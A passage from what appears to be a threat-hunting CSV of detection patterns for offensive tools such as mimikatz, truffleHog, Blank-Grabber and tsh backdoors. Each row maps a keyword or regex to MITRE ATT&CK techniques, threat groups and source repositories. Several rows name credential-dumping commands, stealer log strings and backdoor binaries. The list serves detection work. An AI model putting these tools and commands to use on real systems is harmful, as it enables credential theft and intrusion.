Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61643" "*trufflehog gcs --project-id=*",".{0,1000}trufflehog\sgcs\s\-\-project\-id\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61644" "*trufflehog git *",".{0,1000}trufflehog\sgit\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","61645" "*trufflehog git https://github.com/*",".{0,1000}trufflehog\sgit\shttps\:\/\/github\.com\/.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61646" "*trufflehog github --org=*",".{0,1000}trufflehog\sgithub\s\-\-org\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61647" "*trufflehog github --repo=*",".{0,1000}trufflehog\sgithub\s\-\-repo\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61648" "*trufflehog s3 --bucket=*",".{0,1000}trufflehog\ss3\s\-\-bucket\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61649" "*trufflehog s3 --role-arn=*",".{0,1000}trufflehog\ss3\s\-\-role\-arn\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61650" "*trufflesecurity/trufflehog*",".{0,1000}trufflesecurity\/trufflehog.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","1","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61651" "*TruffleSnout.exe*",".{0,1000}TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","61652" "*--trusted-for-delegation --kdcHost *",".{0,1000}\-\-trusted\-for\-delegation\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","61656" "*TrustedPathDLLHijack*",".{0,1000}TrustedPathDLLHijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","61657" "*TrustedPath-UACBypass-BOF*",".{0,1000}TrustedPath\-UACBypass\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. 
The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","61658" "*trustedsec/DitExplorer*",".{0,1000}trustedsec\/DitExplorer.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","61659" 
"*trustedsec/social-engineer-toolkit*",".{0,1000}trustedsec\/social\-engineer\-toolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","61660" "*trustedsec/specula*",".{0,1000}trustedsec\/specula.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","61661" "*trustedsec/unicorn*",".{0,1000}trustedsec\/unicorn.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","61662" "*TrustExec.exe -m exec*",".{0,1000}TrustExec\.exe\s\-m\sexec.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61663" "*Try opening it with Mimikatz now 
:)*",".{0,1000}Try\sopening\sit\swith\sMimikatz\snow\s\:\).{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","61664" "*try_to_crack_hash(*",".{0,1000}try_to_crack_hash\(.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#content","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","61665" "*TryA9ain/BypassAddUser*",".{0,1000}TryA9ain\/BypassAddUser.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","1","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","61666" "*Trying anon RCE using * for *",".{0,1000}Trying\sanon\sRCE\susing\s.{0,1000}\sfor\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","61667" "*Trying to bypass UAC (Application will restart)*",".{0,1000}Trying\sto\sbypass\sUAC\s\(Application\swill\srestart\).{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","61668" "*Trying to disable defender*",".{0,1000}Trying\sto\sdisable\sdefender.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","61669" "*Trying to dump kernel to C:*",".{0,1000}Trying\sto\sdump\skernel\sto\sC\:.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","61670" "*Trying to exclude bound file from defender*",".{0,1000}Trying\sto\sexclude\sbound\sfile\sfrom\sdefender.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","61672" "*Trying to exclude the file from Windows defender*",".{0,1000}Trying\sto\sexclude\sthe\sfile\sfrom\sWindows\sdefender.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","61673" "*ts.php*vi.txt*",".{0,1000}ts\.php.{0,1000}vi\.txt.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - 
T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61674" "*ts::logonpasswords*",".{0,1000}ts\:\:logonpasswords.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61675" "*ts::mstsc*",".{0,1000}ts\:\:mstsc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61676" "*ts::multirdp*",".{0,1000}ts\:\:multirdp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61677" "*ts::remote*",".{0,1000}ts\:\:remote.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61678" "*ts::sessions*",".{0,1000}ts\:\:sessions.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61679" "*tsh_linux_amd64 *",".{0,1000}tsh_linux_amd64\s.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","61680" "*tsh_runshell(*",".*perror\("".*""\)|.*pel_(send|recv)_msg\(.*\)|.*tsh_(runshell|get_file|put_file)\(.*","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux #content","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","61681" "*tshd_linux_amd64 
*",".{0,1000}tshd_linux_amd64\s.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","61687" "*tshd_windows_amd64.exe *",".{0,1000}tshd_windows_amd64\.exe\s.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","61688" "*tspkg/decryptor.py*",".{0,1000}tspkg\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","61689" "*tufhackteam@gmail.com*",".{0,1000}tufhackteam\@gmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61692" "*tun2socks/releases/download*",".{0,1000}tun2socks\/releases\/download.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","61693" 
"*tun2socks-main.zip*",".{0,1000}tun2socks\-main\.zip.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","61694" "*tun2socks-windows-*.exe*",".{0,1000}tun2socks\-windows\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","61695" "*TunnelGRE/Augustus*",".{0,1000}TunnelGRE\/Augustus.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/TunnelGRE/Augustus","1","1","N/A","N/A","6","2","131","26","2024-07-27T14:47:45Z","2023-08-21T15:08:40Z","61710" "*Tunneling failed! Start your own port forwarding/tunneling service at port *",".{0,1000}Tunneling\sfailed!\sStart\syour\sown\sport\sforwarding\/tunneling\sservice\sat\sport\s.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","61711" "*TunnelVision/pushrouteconfig.sh*",".{0,1000}TunnelVision\/pushrouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","61724" "*turn_keylogger*",".{0,1000}turn_keylogger.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","61734" "*TVqQAAMAAAAEAAAA*",".{0,1000}TVqQAAMAAAAEAAAA.{0,1000}","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","61738" "*TVqQAAMAAAAEAAAA*",".{0,1000}TVqQAAMAAAAEAAAA.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","61739" 
